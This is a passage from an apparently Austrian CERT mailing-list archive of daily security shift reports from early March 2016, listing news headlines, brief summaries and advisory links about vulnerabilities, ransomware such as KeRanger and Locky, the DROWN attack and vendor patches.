deutlich besser. --------------------------------------------- http://www.golem.de/news/security-drown-gefaehrdet-weiterhin-zahlreiche-web… *** Android mobile banking trojan uses layered defenses to avoid removal *** --------------------------------------------- Researchers at ESET have spotted a new Android banking trojan that camouflages itself as a legitimate mobile banking app, but instead of giving access to a persons bank account it steals login credentials. --------------------------------------------- http://www.scmagazine.com/android-mobile-banking-trojan-uses-layered-defens… *** Cisco Prime LAN Management Solution Default Decryption Key Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Security Updates Available for Adobe Flash Player (APSB16-08) *** --------------------------------------------- A Security Bulletin (APSB16-08) has been published regarding security updates for Adobe Flash Player. These updates address critical vulnerabilities, and Adobe recommends users update their product installations to the latest versions using .. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1327

1 0

Tageszusammenfassung - Mittwoch 9-03-2016
by Daily end-of-shift report 09 Mar '16

09 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 08-03-2016 18:00 − Mittwoch 09-03-2016 18:00 Handler: n/a Co-Handler: Stephan Richter *** Apple denies researchers claims of bypassing iOS passcode using Siri *** --------------------------------------------- Vulnerability Lab researchers claim to have spotted multiple passcode bypass vulnerabilities in the latest Apple iOS systems. --------------------------------------------- http://www.scmagazine.com/researchers-says-ios-has-passcode-bypass-vulnerab… *** Microsoft-Patchday: Fünf kritische Lücken, alle Windows-Versionen betroffen *** --------------------------------------------- Microsoft verteilt diesen Monat insgesamt 13 Updates für WIndows, Office und seine beiden Browser Internet Explorer und Edge. Mehrere Lücken erlauben es, Windows-Rechner aus der Ferne zu kapern. --------------------------------------------- http://heise.de/-3131122 *** Trivial path for DDoS amplification attacks found by infosec bods *** --------------------------------------------- 600,000 servers are vulnerable to this little-known protocol Security researchers have discovered a new vector for DDoS amplification attacks - and its quite literally trivial. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/03/09/trivial_ddo… *** KeRanger Mac ransomware is a rewrite of Linux Encoder *** --------------------------------------------- KeRanger, the recently discovered first functional Mac ransomware, is a copy of Linux Encoder, the crypto-ransomware first unearthed and analyzed in November 2015 by Dr. Web researchers. "The encryption functions are identical and have same names: encrypt_file, recursive_task, currentTimestamp and createDaemon to only mention a few. The encryption routine is identical to the one employed in Linux.Encoder", explained Catalin Cosoi, Chief Security Strategist at Bitdefender. --------------------------------------------- https://www.helpnetsecurity.com/2016/03/09/keranger-mac-ransomware-rewrite-… *** A Wall Against Cryptowall? Some Tips for Preventing Ransomware, (Wed, Mar 9th) *** --------------------------------------------- A lot of attention has been paid lately to the Cryptowall / Ransomware family (as in crime family) of malware. What I get asked a lot by clients is how can I prepare / prevent an infection? Prepare is a good word in this case, it encompasses both prevention and setting up processes for dealing with the infection that will inevitably happen in spite of those preventative processes. Plus its the first step in the Preparation / Identification / Containment / Eradication / Restore Service / Lessons... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20821&rss *** Android-Sicherheitsupdates: Immer Ärger mit Stagefright *** --------------------------------------------- Google wird die Stagefright-Probleme nicht los. Auch das März-Update patcht mehrere kritische Lücken, die in den Multimedia-Diensten der Android-Geräte stecken. Updates für Nexus-Smartphones und -Tablets werden bereits verteilt. --------------------------------------------- http://heise.de/-3131138 *** RSA: Seven Attack Trends (March 3, 2016) *** --------------------------------------------- At the RSA Conference in San Francisco last week, SANS researchers described seven cyberattack trends that are likely to come up again and again over the course of this year: Weaponization of Windows PowerShell; Stagefright-like mobile vulnerabilities; Developer environment vulnerabilities like Xcode Ghost; Industrial Control System (ICS) attacks; Targeting unsecure third-party software components; Internet of (Evil) Things; and Ransomware... --------------------------------------------- http://www.sans.org/newsletters/newsbites/r/18/19/201 *** MS16-MAR - Microsoft Security Bulletin Summary for March 2016 - Version: 1.0 *** --------------------------------------------- V1.0 (March 8, 2016): Bulletin Summary published. --------------------------------------------- https://technet.microsoft.com/en-us/library/security/MS16-MAR *** [R1] PHP < 5.6.18 / PCRE < 8.38 Vulnerabilities Affect Tenable SecurityCenter *** --------------------------------------------- http://www.tenable.com/security/tns-2016-04 *** Bugtraq: [security bulletin] HPSBHF03557 rev.1 - HPE Networking Products using Comware 7 (CW7) running NTP, Remote Denial of Service (DoS) *** --------------------------------------------- http://www.securityfocus.com/archive/1/537721 *** Persistent Cross-Site Scripting Vulnerability in Citrix XenMobile Server 10.x Web User Interface *** --------------------------------------------- This vulnerability could potentially be used to execute malicious client-side script in the same context as legitimate content from the web server; if this vulnerability is used to execute script in the browser of an authenticated administrator then the script may be able to gain access to the administrator's session or other potentially sensitive information. --------------------------------------------- https://support.citrix.com/article/CTX207499 *** Cisco Cable Modem with Digital Voice Remote Code Execution Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco ASA Content Security and Control Security Services Module Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Wireless Residential Gateway with EDVA Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Wireless Residential Gateway Information Disclosure Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…

1 0

Tageszusammenfassung - Dienstag 8-03-2016
by Daily end-of-shift report 08 Mar '16

08 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 07-03-2016 18:00 − Dienstag 08-03-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** PhishLabs on the growing sophistication of business email scams *** --------------------------------------------- At the 2016 RSA Conference, CSOs Steve Ragan chats with Joseph Opacki from PhishLabs about how cyber-criminals are becoming increasingly smarter about targeting specific high-end business users to try and steal data or money. --------------------------------------------- http://www.cio.com/video/63026/phishlabs-on-the-growing-sophistication-of-b… *** Google plugs 19 holes in newest Android security update *** --------------------------------------------- In the March 2016 security update for the Android Open Source Project (AOSP), Google has fixed 19 security issues, seven of which are considered to be critical. Among these, and admittedly the most important to patch, are two remote code execution vulnerabilities in - yes, you've guessed it - Mediaserver. Mediaserver is a service in Android that allows the device to index media files that are located on it. The vulnerabilities in question (CVE-2016-0815, CVE-2016-0816)... --------------------------------------------- https://www.helpnetsecurity.com/2016/03/08/android-security-update/ *** Free and Commercial Tools to Implement the Center for Internet Security (CIS) Security Controls, Part 12: Controlled Use of Administrative Privileges *** --------------------------------------------- This is Part 12 of a How-To effort to compile a list of tools (free and commercial) that can help IT administrators comply with what was formerly known as the "SANS Top 20 Security Controls". It is now known as the Center for Internet Security (CIS) Security Controls. A summary of the previous posts is here: Part 1 - we looked at Inventory of Authorized and Unauthorized Devices. Part 2 - we looked at Inventory of Authorized and Unauthorized Software. Part 3 - we looked at Secure... --------------------------------------------- https://www.alienvault.com/blogs/security-essentials/free-and-commercial-to… *** Cloud sellers who acted on Heartbleed sink when it comes to DROWN *** --------------------------------------------- An out-stretched arm slowly disappears... Response to the critical web-crypto-blasting DROWN vulnerability in SSL/TLS by cloud services has been much slower than the frantic patching witnessed when the Heartbleed vulnerability surfaced two years ago. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/03/08/drown_vulne… *** Erpressungs-Trojaner Keranger: Wie Sie Ihren Mac schützen *** --------------------------------------------- Erstmals zielt funktionstüchtige Ransomware auf OS-X-Nutzer ab. Nach der Infektion bleiben drei Tage, bis "Keranger" Dokumente verschlüsselt. Nutzer sollten prüfen, ob sie betroffen sind - und Gegenmaßnahmen ergreifen. --------------------------------------------- http://heise.de/-3130854 *** Security Bulletins Posted *** --------------------------------------------- Security Bulletins for Adobe Digital Editions (APSB16-06) as well as Adobe Acrobat and Reader (APSB16-09) have been published. Adobe recommends users update their product installations to the latest versions using the instructions referenced in the relevant security bulletin. A security... --------------------------------------------- https://blogs.adobe.com/psirt/?p=1322 *** DFN-CERT-2016-0402: ISC DHCP: Eine Schwachstelle ermöglicht einen Denial-of-Service-Angriff *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0402/ *** DFN-CERT-2016-0405: PuTTY: Eine Schwachstelle ermöglicht das Ausführen beliebigen Programmcodes *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0405/ *** DFN-CERT-2016-0400: BlackBerry powered by Android: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes mit den Rechten des Mediaservers *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0400/ *** Bugtraq: ESA-2016-012: EMC Documentum xCP - User Information Disclosure Vulnerability *** --------------------------------------------- http://www.securityfocus.com/archive/1/537712 *** [R3] OpenSSL 20160301 Advisory Affects Tenable Nessus *** --------------------------------------------- http://www.tenable.com/security/tns-2016-03 *** Security Advisory: Libpng vulnerability CVE-2015-8472 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/81/sol81903701.html?… *** Security Advisory: OpenSSL vulnerabilities CVE-2016-0703, CVE-2016-0704, and CVE-2016-0800 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/23/sol23196136.html?… *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) and OpenSSL vulnerabilities affect WebSphere Cast Iron. (CVE-2015-7547 CVE-2015-3193 CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 CVE-2015-1794) *** http://www.ibm.com/support/docview.wss?uid=swg21978339 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in current releases of IBM SDK for Node.js in IBM Bluemix (CVE-2015-3197, CVE-2016-2086, CVE-2016-2216) *** http://www.ibm.com/support/docview.wss?uid=swg21977242 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM XIV Gen2 (CVE-2016-0777, CVE-2016-0778) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005618 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM XIV Gen3 (CVE-2016-0777, CVE-2016-0778) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005619 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM XIV Gen3 systems and IBM XIV Management Tools (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005615 ---------------------------------------------

1 0

Tageszusammenfassung - Montag 7-03-2016
by Daily end-of-shift report 07 Mar '16

07 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 04-03-2016 18:00 − Montag 07-03-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** When a WordPress Plugin Goes Bad *** --------------------------------------------- Last summer we shared a story about the SweetCaptcha WordPress plugin injecting ads and causing malvertising problems for websites that leveraged the plugin. When this plugin was removed from the official WordPress Plugin directory, the authors revived another WordPress account with a long abandoned plugin and uploaded SweetCaptcha as a "new version" of that plugin. --------------------------------------------- https://blog.sucuri.net/2016/03/when-wordpress-plugin-goes-bad.html *** Novel method for slowing down Locky on Samba server using fail2ban, (Sun, Mar 6th) *** --------------------------------------------- One of our loyal readers, Gebhard, pointed out a nice post (in German) on how to slow down Lockyif you are using a Samba server for filesharing in your environment. The technique takes advantage of fail2ban and some additional Samba logging to keep Locky from encrypting all the files on the share. It is worth a look. ">[de]:">[en]:https://translate.google.com/translate?sl=autotl=enjs=yprev=_thl=enie=U… --------------- Jim Clausing, --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20805&rss *** KeRanger: Erste Ransomware-Kampagne bedroht Mac OS X *** --------------------------------------------- Ein Erpressungs-Trojaner verschlüsselt erstmals auch Daten von Mac-Nutzern. Der Schädling versteckt sich im BitTorrent-Client Transmission. Apple und die Entwickler haben bereits reagiert. --------------------------------------------- http://heise.de/-3129346 *** Bundestags-Hack: Angriff mit gängigen Methoden und Open-Source-Tools *** --------------------------------------------- Interne Dokumente bringen neue Details zum Hackerangriff auf den Bundestag im letzten Jahr ans Licht: Die Angreifer bedienten sich gängiger Methoden und setzten frei verfügbare Werkzeuge ein. --------------------------------------------- http://heise.de/-3129862 *** Maintainers of new generic top level domains have a hard time keeping abuse in check *** --------------------------------------------- Generic top-level domains (gTLDs) that have sprung up in recent years have become a magnet for cybercriminals, to the point where some of them host more malicious domains than legitimate ones.Spamhaus, an organization that monitors spam, botnet and malware activity on the Internet, has published a list of the worlds top 10 "worst TLDs" on Saturday. Whats interesting is that the list is not based on the overall number of abusive domains hosted under a TLD, but on the TLDs ratio of... --------------------------------------------- http://www.cio.com/article/3041338/maintainers-of-new-generic-top-level-dom… *** DFN-CERT-2016-0398: Squid: Zwei Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0398/ *** HPE Network Automation Unspecified Flaws Let Remote Users Execute Arbitrary Code and Obtain Potentially Sensitive Information *** --------------------------------------------- http://www.securitytracker.com/id/1035192 *** Filr 2.0 - Security Update 1 *** --------------------------------------------- Abstract: Security Updates for glibc and nscd on the Filr, Search and MySQL 2.0.0 appliances (CVE-2015-7547).Document ID: 5237510Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:MySQL-2.0.0.182.HP.zip (21.71 MB)Filr-2.0.0.422.HP.zip (23.03 MB)Search-2.0.0.400.HP.zip (21.71 MB)Products:Filr 2Superceded Patches: None --------------------------------------------- https://download.novell.com/Download?buildid=LqikC-Hosps~ *** Filr 1.2 - Security Update 2 *** --------------------------------------------- Abstract: Security Updates for glibc and nscd on the Filr, Search and MySQL 1.2.0 appliances (CVE-2015-7547).Document ID: 5237480Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:Filr-1.2.0.861.HP.zip (23.03 MB)MySQL-1.2.0.413.HP.zip (21.71 MB)Search-1.2.0.998.HP.zip (21.71 MB)Products:Filr 1.2Superceded Patches: None --------------------------------------------- https://download.novell.com/Download?buildid=PQBDzZUKFac~ *** Sentinel 7.4 SP1 (Sentinel 7.4.1.0) Build 2512 *** --------------------------------------------- Abstract: Sentinel 7.4.1 upgrade for Sentinel 7.4Document ID: 5237090Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:sentinel_server-7.4.1.0-2512.x86_64.tar.gz.sha256 (109 bytes)sentinel_server-7.4.1.0-2512.x86_64.tar.gz (1.74 GB)Products:SentinelSentinel 7.3Sentinel 7.3.1Sentinel 7.3.2Sentinel 7.4Sentinel 7.2Sentinel 7.2.1Sentinel 7.2.2Sentinel 7.4.1Superceded Patches: None --------------------------------------------- https://download.novell.com/Download?buildid=ZEMvbiAk5k8~ *** innovaphone IP222 / IP232 Denial Of Service *** --------------------------------------------- Topic: innovaphone IP222 / IP232 Denial Of Service Risk: Medium Text: --BEGIN PGP SIGNED MESSAGE -- Hash: SHA512 Advisory ID: SYSS-2015-053 Product: innovaphone IP222/IP232 Manufacturer: inn... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016030035 *** Bugtraq: Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities (App Store Link, Buy Tones Link & Weather Channel Link) *** --------------------------------------------- http://www.securityfocus.com/archive/1/537708 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in libpng affect PowerKVM (CVE-2015-8126, CVE-2015-8472) *** 2016-03-07T08:14:25-05:00 http://www.ibm.com/support/docview.wss?uid=isg3T1023374 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM MQ Appliance (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=swg21977498 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in the GNU C Library (glibc) affect PowerKVM *** http://www.ibm.com/support/docview.wss?uid=isg3T1023385 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Guardium (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=swg21977444 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in grub2 affect PowerKVM (CVE-2015-5281, CVE-2015-8370) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023376 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in netcf affects PowerKVM (CVE-2014-8119) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023367 --------------------------------------------- *** IBM Security Bulletin: Lotus Protector for Mail affected by libcurl vulnerability (CVE-2016-0755) *** http://www.ibm.com/support/docview.wss?uid=swg21977843 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in libxml2 affect PowerKVM *** http://www.ibm.com/support/docview.wss?uid=isg3T1023350 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in bind affects PowerKVM (CVE-2015-8704) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023372 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in MIT Kerberos 5 (krb5) affect PowerKVM (CVE-2014-5355, CVE-2015-2694) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023354 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in file affect PowerKVM *** http://www.ibm.com/support/docview.wss?uid=isg3T1023349 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in xfsprogs affects PowerKVM (CVE-2012-2150) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023356 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in Gnu binutils affect PowerKVM *** http://www.ibm.com/support/docview.wss?uid=isg3T1023355 ---------------------------------------------

1 0

Tageszusammenfassung - Freitag 4-03-2016
by Daily end-of-shift report 04 Mar '16

04 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 03-03-2016 18:00 − Freitag 04-03-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Upcoming Security Updates for Adobe Acrobat and Reader (APSB16-09) *** --------------------------------------------- A prenotification Security Advisory has been posted regarding upcoming updates for Adobe Acrobat and Reader scheduled for Tuesday, March 8, 2016. We will continue to provide updates on the upcoming release via the Security Advisory as well as the .. --------------------------------------------- https://blogs.adobe.com/psirt/?p=1319 *** Open-Xchange Guard 2.2.0 / 2.0 Private Key Disclosure *** --------------------------------------------- The "getprivkeybyid" API call is used to download a PGP Private Key for a specific user after providing authentication credentials. Clients provide the "id" and "cid" parameter to specify the current user by its user- and context-ID. The "auth" parameter contains .. --------------------------------------------- https://cxsecurity.com/issue/WLB-2016030034 *** Kriminelle setzen oft auf Standard-Passwörter *** --------------------------------------------- Im Projekt Heisenberg haben Honeypots einen RDP-Port angeboten. Sicherheitsforscher werteten im weiteren Verlauf die Login-Daten von Angreifern aus. --------------------------------------------- http://www.heise.de/newsticker/meldung/Kriminelle-setzen-oft-auf-Standard-P… *** NCSC publishes factsheet Disable SSL 2.0 and upgrade OpenSSL *** --------------------------------------------- On 1 March, a group of researchers presented the DROWN attack methods for TLS. An attacker uses DROWN to abuse servers that still support SSL 2.0. Servers that run a vulnerable version of OpenSSL can be abused in the same way, regardless of whether they support SSL 2.0. An attacker who is able to intercept network traffic that is secured with TLS, may attempt to decrypt this traffic .. --------------------------------------------- https://www.ncsc.nl/english/current-topics/news/ncsc-publishes-factsheet-di… *** Mit Sicherheit - BSI-Magazin 2016/01 *** --------------------------------------------- in dieser Ausgabe des BSI-Magazins blicken wir zurück auf ein Vierteljahrhundert deutsche IT-Sicherheitsgeschichte, denn das Bundesamt für Sicherheit in der Informationstechnik feiert in diesem Jahr sein .. --------------------------------------------- https://www.bsi.bund.de/DE/Publikationen/BSI-Magazin/BSI-Magazin_node.html *** Amazon App Store verbreitet Android-Trojaner *** --------------------------------------------- Kann Nutzer umfassend ausspionieren – Lässt sich aber auch einfach deinstallieren .. --------------------------------------------- http://derstandard.at/2000032287420 *** Drown-Angriff: Server4You stellt tausende betroffene Kunden bloss *** --------------------------------------------- In einem Abuse-Ticket von Server4You an Kunden mit vom Drown-Angriff bedrohten Servern tauchen zehntausende IP-Adressen und Ports betroffener Server auf. Zudem stellt der Hoster den Kunden ein Ultimatum - rudert mittlerweile aber wieder zurück. --------------------------------------------- http://heise.de/-3128656 *** Amazon entfernt Verschlüsselungsfunktion aus Fire-Tablets *** --------------------------------------------- Weil die Kunden sie nicht benutzt hätten, hat Amazon die Android-Funktion zur Verschlüsselung des Speichers aus dem Betriebssystem seiner Fire-Tablets entfernt. So zumindest erklärt der Konzern den nun bekannt gewordenen Schritt. --------------------------------------------- http://heise.de/-3128844 *** Chaos Computer Club bekommt Schwesterverein in Wien *** --------------------------------------------- Mitgliederversammlung am Samstag - Hackertreffen Easterhegg findet in Salzburg statt --------------------------------------------- http://derstandard.at/2000032301583

1 0

Tageszusammenfassung - Donnerstag 3-03-2016
by Daily end-of-shift report 03 Mar '16

03 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 02-03-2016 18:00 − Donnerstag 03-03-2016 18:00 Handler: Stephan Richter Co-Handler: Alexander Riepl *** Cisco Unified Communications Domain Manager Cross-Site Scripting Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** LibreSSL Unaffected By DROWN *** --------------------------------------------- The OpenBSD people forked and heavily cleaned up OpenSSL to create LibreSSL due to dissatisfaction with the maintainance of OpenSSL, culminating in the heartbleed bug. The emphasis has been on cleaning up the code and improving security, which includes removing things such as SSL2 which has fundamental security flaws. As a result, LibreSSL is not .. --------------------------------------------- http://it.slashdot.org/story/16/03/02/1620221/libressl-unaffected-by-drown *** Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: March 2016 *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Prime Infrastructure Log File Remote Code Execution Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Schneider Electric Building Operation Automation Server Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a vulnerability in servers programmed with Schneider Electric's StruxureWare Building Operation software. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01 *** Rockwell Automation Allen-Bradley CompactLogix Reflective Cross-Site Scripting Vulnerability *** --------------------------------------------- This advisory is a follow-up to the alert titled ICS-ALERT-15-225-01A Rockwell Automation 1766-L32 Series Vulnerability that was published August 13, 2015, on the NCCIC/ICS-CERT web site. This advisory contains mitigation details for a cross-site scripting vulnerability in Rockwell Automation's CompactLogix application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-061-02 *** Windows Built-In PDF Reader Exposes Edge Browser To Hacking *** --------------------------------------------- Edge, Microsofts new browser, uses the WinRT PDF library to automatically embed and present PDF files while navigating the web. This is what Java does with applets, and Flash with SWF files -- it unintentionally allows a hacker to append malicious code to PDF files and trigger drive-by attacks, which exploit WinRT .. --------------------------------------------- http://news.slashdot.org/story/16/03/02/2210256/windows-built-in-pdf-reader… *** Open-Xchange Guard Access Control Flaw Lets Remote Authenticated Users Obtain Private Keys in Certain Cases *** --------------------------------------------- http://www.securitytracker.com/id/1035174 *** Google Analytics Counter - Moderately Critical - CSRF - SA-CONTRIB-2016-011 *** --------------------------------------------- The Google Analytics Counter module provides total pageview counts for each page on a website. In that it is similar to the core Statistics module counter, but it is much lighter and ultimately faster because it draws on .. --------------------------------------------- https://www.drupal.org/node/2679515 *** Register now for the International NCSC One Conference 2016 *** --------------------------------------------- Protecting Bits & Atoms is the theme for our international One Conference 2016. It is especially timely given the increasingly connected physical and digital worlds and how information and communication technologies (ICT) have ingrained themselves into the very fabric of our society. The ONE conference will take place on Tuesday April 5 and Wednesday April 6 at the World Forum in The Hague, The Netherlands. --------------------------------------------- https://www.ncsc.nl/english/current-topics/news/register-now-for-the-intern… *** Wie Betrüger Apple Pay missbrauchen können *** --------------------------------------------- Apple Pay ist praktisch und gilt als sicher. Doch das System lässt sich von Kriminellen missbrauchen, um digitale Kreditkartenkopien zu erstellen. --------------------------------------------- http://www.golem.de/news/security-wie-betrueger-apple-pay-missbrauchen-koen… *** Java Deserialization Attacks with Burp *** --------------------------------------------- This blog is about Java deserialization and the Java Serial Killer Burp extension. If you want to download the extension and skip past all of this, head to the Github page here. The recent Java deserialization attack that was discovered has provided a large window of opportunity for penetration testers to gain access to the underlying systems that Java applications communicate with. --------------------------------------------- https://blog.netspi.com/java-deserialization-attacks-burp/ *** Valve informiert Steam-Nutzer über Weihnachts-Datenpanne *** --------------------------------------------- Fast drei Monate nach der massiven Datenpanne informiert Valve nun die betroffenen Nutzer. Die hatten das Problem in der Zwischenzeit wahrscheinlich längst vergessen. --------------------------------------------- http://heise.de/-3127829

1 0

Tageszusammenfassung - Mittwoch 2-03-2016
by Daily end-of-shift report 02 Mar '16

02 Mar '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 01-03-2016 18:00 − Mittwoch 02-03-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Threat Actors Behind "Shrouded Crossbow" Create BIFROSE for UNIX *** --------------------------------------------- We recently came across a variant of the BIFROSE malware that has been rewritten for UNIX and UNIX-like systems. This is the latest tool developed by attackers behind operation Shrouded Crossbow, which have produced other BIFROSE variants such as KIVARS and KIVARS x64. UNIX-based operating systems are widely used in servers, workstations, and even mobile devices. With a lot of highly confidential data found in these servers and devices, a UNIX version of BIFROSE can certainly be classified as a... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/m3eM40z3oI8/ *** Cachebleed-Angriff: CPU-Cache kann private Schlüssel verraten *** --------------------------------------------- Forschern ist es gelungen, RSA-Verschlüsselungsoperationen von OpenSSL mittels eines Cache-Timing-Angriffs zu belauschen und so den privaten Key zu knacken. Der Cachebleed-Angriff nutzt dabei Zugriffskonflikte auf den Cache-Speicher. --------------------------------------------- http://www.golem.de/news/cachebleed-angriff-cpu-cache-kann-private-schluess… *** Let's ride with TeslaCrypt *** --------------------------------------------- TeslaCrypt is a ransomware spread by e-mails or exploit kits. It encrypts your files and asks you to pay in order to retrieve the decryption key. The current version is 3.0. Many analysis are already available on the Internet. In this article we are focusing on two aspects of TeslaCrypt: - The attack vector - The web callback... --------------------------------------------- http://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/ *** Security: Angebliche Locky-Warnung vom BKA ist ein Trojaner *** --------------------------------------------- Die Angst vor Locky wird jetzt offenbar von Kriminellen ausgenutzt. In einer angeblich vom Bundeskriminalamt stammenden Mail wird vor dem Kryptotrojaner gewarnt und ein Werkzeug zur Entfernung angeboten - das selbst Malware enthält. --------------------------------------------- http://www.golem.de/news/security-angebliche-locky-warnung-vom-bka-ist-ein-… *** $17 smartwatch sends something to random Chinese IP address *** --------------------------------------------- Samsung Gear 2 also has some problems, researcher says RSA bsides A cheap smart watch often peddled on eBay uses a pairing app for Android or iOS that contains a backdoor that quietly connects to an unknown Chinese IP address. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/03/02/chinese_bac… *** iPhone-Fingerabdruck lässt sich mit Plastilin austricksen *** --------------------------------------------- Ein Hersteller von Fingerabdrucksensoren zeigt, wie einfach Apples Touch-ID mit gefälschten Fingerabdrücken zu umgehen ist. --------------------------------------------- http://futurezone.at/produkte/iphone-fingerabdruck-laesst-sich-mit-plastili… *** Der DROWN Angriff auf SSL/TLS *** --------------------------------------------- Es ist wieder soweit: Es gibt einen Presserummel rund um eine neu entdeckte Schwachstelle in SSL/TLS. Es gibt einen Namen (DROWN = Decrypting RSA with Obsolete and Weakened eNcryption) und ein fancy Logo. Nachzulesen ist alles unter: [...] Wir haben uns das angesehen und beschlossen, dazu keine offizielle Warnung zu publizieren. Das Problem ist nicht so dringend und dramatisch, wie manche... --------------------------------------------- http://www.cert.at/services/blog/20160302151126-1688.html *** Django Bugs Let Remote Users Conduct Redirect and Cross-Site Scripting Attacks and Determine Valid Usernames *** --------------------------------------------- http://www.securitytracker.com/id/1035152 *** DFN-CERT-2016-0366: Perl: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes mit Benutzerrechten *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0366/ *** Intel Security - Security Bulletin: Protected resource access bypass vulnerability resolved in multiple McAfee endpoint products for Microsoft Windows *** --------------------------------------------- Multiple McAfee endpoint products include a private mechanism to access settings and files protected by self-protection rules. This mechanism is not sufficiently secure and may be misused to access registry keys and files that should be protected from tampering. --------------------------------------------- https://kc.mcafee.com/corporate/index?page=content&id=SB10151 *** Schneider Electric Building Operation Application Server Vulnerability *** --------------------------------------------- This advisory contains mitigation details for a vulnerability in servers programmed with Schneider Electric's StruxureWare Building Operation software. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01 *** Rockwell Automation Allen-Bradley CompactLogix Reflective Cross-Site Scripiting *** --------------------------------------------- This advisory is a follow-up to the alert titled ICS-ALERT-15-225-01A Rockwell Automation 1766-L32 Series Vulnerability that was published August 13, 2015, on the NCCIC/ICS-CERT web site. This advisory contains mitigation details for a cross-site scripting vulnerability in Rockwell Automation's CompactLogix application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-061-02 *** Cisco Security Advisories *** --------------------------------------------- *** Cisco NX-OS Software TCP Netstack Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Nexus 3000 Series and 3500 Platform Switches Insecure Default Credentials Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Web Security Appliance HTTPS Packet Processing Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco NX-OS Software SNMP Packet Denial of Service Vulnerability *** 